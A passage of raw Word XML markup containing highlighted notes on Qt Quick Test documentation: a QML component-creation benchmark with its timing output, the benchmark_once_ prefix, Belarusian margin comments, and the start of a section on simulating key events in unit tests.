      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt benchmark framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with an average timing value reported for the runs. This is </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>equivalent</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QBENCHMARK</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>macro in the C++ version of</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1948" w:history="1">
        <w:r w:rsidRPr="00597C1C">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QTestLib</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TestCase</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id</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top</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name</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"CreateBenchmark"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> benchmark_create_component</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> component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hyperlink r:id="rId1949" w:history="1">
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt</w:t>
        </w:r>
      </w:hyperlink>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createComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"item.qml"</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> obj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component</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createObject</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top</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obj</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destroy</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component</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destroy</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RESULT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CreateBenchmark</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benchmark_create_component</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0.23</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> msecs per iteration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total</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60</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iterations</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>256</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">PASS   </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CreateBenchmark</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benchmark_create_component</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To get the </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>effect of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QBENCHMARK_ONCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>macro, prefix the test function name with "benchmark_once_".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00597C1C" w:rsidRDefault="00111EA1" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00597C1C" w:rsidRPr="00597C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Не правяраў, але, як я разумею, можна выкарыстоўваць для праверкі, нап</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>рыклад, часу стварэння аб’екта.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00111EA1" w:rsidRPr="00111EA1" w:rsidRDefault="00111EA1" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>ужо праверыў ))) працуе добра ;)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00111EA1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1590" w:name="simulating-keyboard-and-mouse-events"/>
      <w:bookmarkStart w:id="1591" w:name="_Toc483000875"/>
      <w:bookmarkStart w:id="1592" w:name="_Toc483003868"/>
      <w:bookmarkStart w:id="1593" w:name="_Toc483604220"/>
      <w:bookmarkStart w:id="1594" w:name="_Toc483605440"/>
      <w:bookmarkEnd w:id="1590"/>
      <w:r w:rsidRPr="00111EA1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simulating keyboard and mouse events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1591"/>
      <w:bookmarkEnd w:id="1592"/>
      <w:bookmarkEnd w:id="1593"/>
      <w:bookmarkEnd w:id="1594"/>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="00302D13" w:rsidRDefault="00302D13" w:rsidP="00302D13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1950" w:anchor="keyPress-method" w:history="1">
        <w:r w:rsidRPr="00436296">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>keyPress</w:t>
        </w:r>
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1951" w:anchor="keyRelease-method" w:history="1">
        <w:r w:rsidRPr="00436296">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>keyRelease</w:t>
        </w:r>
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1952" w:anchor="keyClick-method" w:history="1">
        <w:r w:rsidRPr="00436296">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>keyClick</w:t>
        </w:r>
        <w:r w:rsidRPr="00302D13">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">methods can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simulate keyboard events</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within unit tests. The </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>events are delivered to the currently focused QML item</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. You can pass either a </w:t>
      </w:r>
      <w:r w:rsidRPr="001E089F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00302D13">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enum value or a latin1 char (string of length one)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325"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E1325">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302D13" w:rsidRPr="002E1325"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E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> height</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002E1325">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
